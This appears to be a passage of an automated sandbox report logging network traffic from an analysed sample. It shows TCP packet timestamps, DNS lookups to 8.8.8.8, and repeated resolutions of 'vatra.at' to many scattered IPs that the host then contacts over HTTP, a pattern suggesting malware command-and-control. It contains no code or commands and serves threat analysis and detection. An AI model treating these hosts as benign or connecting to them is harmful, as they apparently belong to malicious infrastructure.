                                                          Jan 3, 2023 09:46:54.799474001 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.799488068 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.799652100 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.799732924 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.799743891 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.799846888 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.799912930 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.799923897 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.800081968 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.800159931 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.800169945 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.800375938 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.800503016 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.800513983 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.801069975 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.801179886 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.801196098 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.801325083 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.801403999 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.801414967 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.801561117 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.801640987 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.801652908 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.801789999 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.801886082 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.801898956 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.804305077 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.804431915 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.804452896 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.804522038 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.804847002 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.804908991 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.805073023 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.805213928 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.805250883 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.805521965 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.805686951 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.805689096 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.805716038 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.805821896 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.805850029 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.805917025 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.805946112 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.805972099 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806047916 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.806113958 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806142092 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.806165934 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806245089 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.806288958 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806333065 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.806355000 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806436062 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.806485891 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806529999 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.806552887 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806644917 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.806658983 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806850910 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806870937 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.806900024 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.806976080 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.807065964 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.807090044 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.807121992 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.807239056 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.807264090 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.807353973 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.807459116 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.807487011 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.811197996 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.811248064 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.811362982 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.811777115 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.828732967 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.828896999 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.828915119 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.828938007 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.828991890 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.829046011 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.829062939 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.829168081 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.829277039 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.829296112 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.829485893 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.829569101 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.829591036 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.830144882 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.830246925 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.830271006 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.830455065 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.830540895 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.830562115 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.830837965 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.830934048 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.830954075 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.831110001 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.831183910 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.831203938 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.831458092 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.831538916 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.831562042 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.831605911 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.831674099 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.831688881 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.831899881 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.831974030 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.831993103 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.832216978 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.832293987 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.832313061 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.832509995 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.832591057 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.832613945 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.832791090 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.832882881 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.832901955 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833074093 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833142042 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.833168983 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833215952 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833290100 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.833307981 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833463907 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833534956 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.833555937 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833677053 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833754063 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.833772898 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833925962 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.833993912 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.834008932 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.834068060 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.834137917 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.834156990 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.834367037 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.834449053 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.834462881 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.834599018 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.834665060 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.834681034 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835515976 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835621119 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.835649014 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835666895 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835726976 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.835751057 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835794926 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835803986 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.835817099 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835856915 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.835901022 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.835912943 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835927010 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.835985899 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.835999012 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836042881 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836111069 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.836126089 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836174011 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836236000 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.836251974 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836355925 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836424112 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.836438894 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836498976 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836566925 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.836580992 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836646080 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836710930 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.836726904 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836772919 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836838007 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.836850882 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836894989 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.836987972 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.837002993 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.837017059 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.837061882 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.837155104 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.837230921 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.837245941 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.837280035 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.837332010 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.837347984 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.837390900 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.837392092 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.837433100 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.837606907 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.837745905 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.842129946 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.842168093 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:54.842190981 CET49714443192.168.2.55.135.247.111
                                                          Jan 3, 2023 09:46:54.842204094 CET443497145.135.247.111192.168.2.5
                                                          Jan 3, 2023 09:46:55.777519941 CET4971580192.168.2.593.112.238.85
                                                          Jan 3, 2023 09:46:55.876894951 CET804971593.112.238.85192.168.2.5
                                                          Jan 3, 2023 09:46:55.877068996 CET4971580192.168.2.593.112.238.85
                                                          Jan 3, 2023 09:46:55.877154112 CET4971580192.168.2.593.112.238.85
                                                          Jan 3, 2023 09:46:55.879159927 CET4971580192.168.2.593.112.238.85
                                                          Jan 3, 2023 09:46:55.977600098 CET804971593.112.238.85192.168.2.5
                                                          Jan 3, 2023 09:46:56.320611954 CET804971593.112.238.85192.168.2.5
                                                          Jan 3, 2023 09:46:56.320753098 CET4971580192.168.2.593.112.238.85
                                                          Jan 3, 2023 09:46:56.325067043 CET804971593.112.238.85192.168.2.5
                                                          Jan 3, 2023 09:46:56.325304985 CET4971580192.168.2.593.112.238.85
                                                          Jan 3, 2023 09:46:56.347650051 CET4971680192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:56.419013977 CET804971593.112.238.85192.168.2.5
                                                          Jan 3, 2023 09:46:56.466700077 CET8049716195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:56.466835022 CET4971680192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:56.466929913 CET4971680192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:56.467057943 CET4971680192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:56.586312056 CET8049716195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:57.028589010 CET8049716195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:57.028631926 CET8049716195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:57.028779030 CET4971680192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:57.028848886 CET4971680192.168.2.5195.158.3.162
                                                          Jan 3, 2023 09:46:57.067939997 CET4971780192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:57.150620937 CET8049716195.158.3.162192.168.2.5
                                                          Jan 3, 2023 09:46:57.365164995 CET804971758.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:57.365362883 CET4971780192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:57.365504026 CET4971780192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:57.365545034 CET4971780192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:57.662678003 CET804971758.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:58.582076073 CET804971758.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:58.582120895 CET804971758.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:58.582231045 CET4971780192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:58.582308054 CET4971780192.168.2.558.235.189.192
                                                          Jan 3, 2023 09:46:58.624758959 CET4971980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:58.879075050 CET804971758.235.189.192192.168.2.5
                                                          Jan 3, 2023 09:46:58.921979904 CET8049719175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:58.922091961 CET4971980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:58.922198057 CET4971980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:58.922215939 CET4971980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:59.219084978 CET8049719175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:59.847616911 CET8049719175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:59.847649097 CET8049719175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:46:59.847768068 CET4971980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:46:59.847851992 CET4971980192.168.2.5175.120.254.9
                                                          Jan 3, 2023 09:47:00.089468956 CET4972080192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:47:00.144685030 CET8049719175.120.254.9192.168.2.5
                                                          Jan 3, 2023 09:47:00.357709885 CET8049720211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:47:00.357834101 CET4972080192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:47:00.357947111 CET4972080192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:47:00.357969046 CET4972080192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:47:00.626065969 CET8049720211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:47:01.673994064 CET8049720211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:47:01.674078941 CET8049720211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:47:01.674145937 CET4972080192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:47:01.674145937 CET4972080192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:47:02.201354027 CET4972180192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:02.380955935 CET4972080192.168.2.5211.171.233.126
                                                          Jan 3, 2023 09:47:02.399271011 CET8049721190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:02.399425030 CET4972180192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:02.399616003 CET4972180192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:02.402019024 CET4972180192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:02.603060961 CET8049721190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:02.648997068 CET8049720211.171.233.126192.168.2.5
                                                          Jan 3, 2023 09:47:03.289249897 CET8049721190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:03.289397001 CET4972180192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:03.294987917 CET8049721190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:03.296278954 CET4972180192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:03.333415031 CET4972280192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:03.485085011 CET8049721190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:03.538317919 CET8049722190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:03.538463116 CET4972280192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:03.538563967 CET4972280192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:03.538582087 CET4972280192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:03.748282909 CET8049722190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:04.442612886 CET8049722190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:04.442647934 CET8049722190.140.74.43192.168.2.5
                                                          Jan 3, 2023 09:47:04.442714930 CET4972280192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:04.443233013 CET4972280192.168.2.5190.140.74.43
                                                          Jan 3, 2023 09:47:04.644234896 CET8049722190.140.74.43192.168.2.5
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 3, 2023 09:46:26.467391014 CET5148453192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:26.947051048 CET53514848.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:27.830970049 CET6344653192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:28.340996981 CET53634468.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:30.075356007 CET5675153192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:30.093204021 CET53567518.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:52.890737057 CET6097553192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:52.910130978 CET53609758.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:54.501797915 CET5922053192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:54.537024021 CET53592208.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:55.513380051 CET5506853192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:55.776840925 CET53550688.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:56.328963995 CET5668253192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:56.346973896 CET53566828.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:57.049041986 CET5853253192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:57.067291975 CET53585328.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:58.603823900 CET5858153192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:46:58.623935938 CET53585818.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:46:59.858340025 CET5626353192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:47:00.088844061 CET53562638.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:47:01.681643009 CET6551353192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:47:02.193207979 CET53655138.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:47:03.313154936 CET5668753192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:47:03.332684994 CET53566878.8.8.8192.168.2.5
                                                          Jan 3, 2023 09:47:04.455770969 CET6441953192.168.2.58.8.8.8
                                                          Jan 3, 2023 09:47:04.931497097 CET53644198.8.8.8192.168.2.5
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 3, 2023 09:46:26.467391014 CET192.168.2.58.8.8.80xddd8Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:27.830970049 CET192.168.2.58.8.8.80x6fe6Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.075356007 CET192.168.2.58.8.8.80xb88dStandard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.890737057 CET192.168.2.58.8.8.80x6810Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:54.501797915 CET192.168.2.58.8.8.80x281eStandard query (0)degroeneuitzender.nlA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.513380051 CET192.168.2.58.8.8.80xe866Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.328963995 CET192.168.2.58.8.8.80xe62cStandard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.049041986 CET192.168.2.58.8.8.80x82bdStandard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.603823900 CET192.168.2.58.8.8.80xc830Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:59.858340025 CET192.168.2.58.8.8.80x2229Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:01.681643009 CET192.168.2.58.8.8.80xf2d3Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.313154936 CET192.168.2.58.8.8.80x11d3Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.455770969 CET192.168.2.58.8.8.80x5924Standard query (0)vatra.atA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:26.947051048 CET8.8.8.8192.168.2.50xddd8No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
